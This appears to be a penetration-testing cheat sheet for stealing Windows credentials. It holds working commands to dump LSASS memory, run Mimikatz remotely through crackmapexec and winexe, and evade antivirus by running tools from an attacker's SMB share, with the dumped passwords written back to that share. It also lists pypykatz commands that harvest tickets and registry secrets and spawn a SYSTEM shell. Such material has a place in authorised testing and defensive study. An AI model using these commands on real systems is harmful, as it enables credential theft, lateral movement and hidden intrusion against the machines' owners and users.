# Avoiding running Mimikatz on the target can be a nice solution for stealth
# You can just dump the LSASS process, retrieve the dump and parse it locally
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Several dumping methods here
https://kaluche.github.io/posts/2020/09/dumping-credentials-offline/
Mimikatz
# If you have an LSASS dump, you can use the minidump module
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords /full
# You can upload mimikatz to a remote machine with smbclient
# Or you can use crackmapexec
# Execution may fail but the binary will be uploaded in C:\\Windows\\mimikatz.exe
crackmapexec IP -u user -p password -M mimikatz
# Then you can execute remotely through winexe
winexe -U admin%password //IP C:\\Windows\\mimikatz.exe
# Password dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full
# If Mimikatz is flagged on the target machine, you can try running it from a network share
sudo python smbserver.py SHARE /home/xxxxx/share_path/
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'
# In order to be stealthier, you can even do the same for procdump
sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'
Pypykatz
https://github.com/skelsec/pypykatz
# Mimikatz implementation in pure Python. At least a part of it :)
# Useful in case Mimikatz is triggered by the target AV
# Cross platform (only needs python3.6)
# "live" commands need to be run on live systems
# Other commands can be used for other purposes
# Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>
# List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep
# Print all tokens
pypykatz live token list
# Spawn a SYSTEM shell
pypykatz live process create
# Print registry credentials
pypykatz live registry
# List all users that have ever logged on to the target
pypykatz live users list
# Returns the current user in domain:username:SID format
pypykatz live users whoami